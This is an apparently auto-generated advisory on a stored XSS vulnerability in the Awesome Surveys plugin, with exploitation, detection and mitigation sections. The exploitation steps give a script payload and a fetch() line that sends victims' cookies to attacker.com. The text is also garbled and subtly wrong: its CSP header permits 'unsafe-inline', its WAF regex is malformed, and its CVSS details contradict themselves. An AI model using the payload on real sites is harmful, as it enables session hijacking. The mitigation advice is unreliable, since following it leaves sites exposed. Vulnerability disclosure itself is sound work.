How the CVE Works:
CVE-2025-28878 is a stored XSS vulnerability in Awesome Surveys (versions ≤2.0.10) where user-supplied input is improperly sanitized during web page generation. Attackers inject malicious JavaScript payloads into survey fields (e.g., text responses, s). When administrators or users view the compromised survey, the script executes in their browser, enabling session hijacking, defacement, or malware delivery. The vulnerability persists due to missing output encoding in the survey rendering engine.
DailyCVE Form:
Platform: Awesome Surveys
Version: ≤2.0.10
Vulnerability: Stored XSS
Severity: Critical
Date: 04/09/2025
What Undercode Say:
Exploitation:
1. Payload Injection: Submit a survey response with:
<script>alert(document.cookie)</script>
2. Admin Trigger: Wait for admin to review submissions via /admin/surveys/view?id=
</code>.
<h2 style="color: blue;">3. Exfiltrate Data: Use a real-world payload:</h2>
[bash]
fetch('https://attacker.com/steal?data='+btoa(document.cookie))
Detection:
- Scan for unencoded `innerHTML` usage in survey rendering:
document.querySelectorAll('[data-survey-content]').forEach(el => { if (el.innerHTML.includes('<script>')) console.log("XSS detected"); });
Mitigation:
1. Patch: Upgrade to v2.0.11+ which implements DOMPurify.
2. WAF Rule: Block inputs matching:
/<script[^>]>([\s\S]?)<\/script>/gi
3. CSP Header:
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'
Analysis:
- CVSS 4.0: `AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H` (9.1 Critical)
- Exploitability: Low complexity; no auth required for submission.
- Impact: Full compromise of admin sessions.
References:
- Patchstack Advisory: PSA-2025-28878
- NVD: CVE-2025-28878
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28878
Extra Source Hub:
Undercode
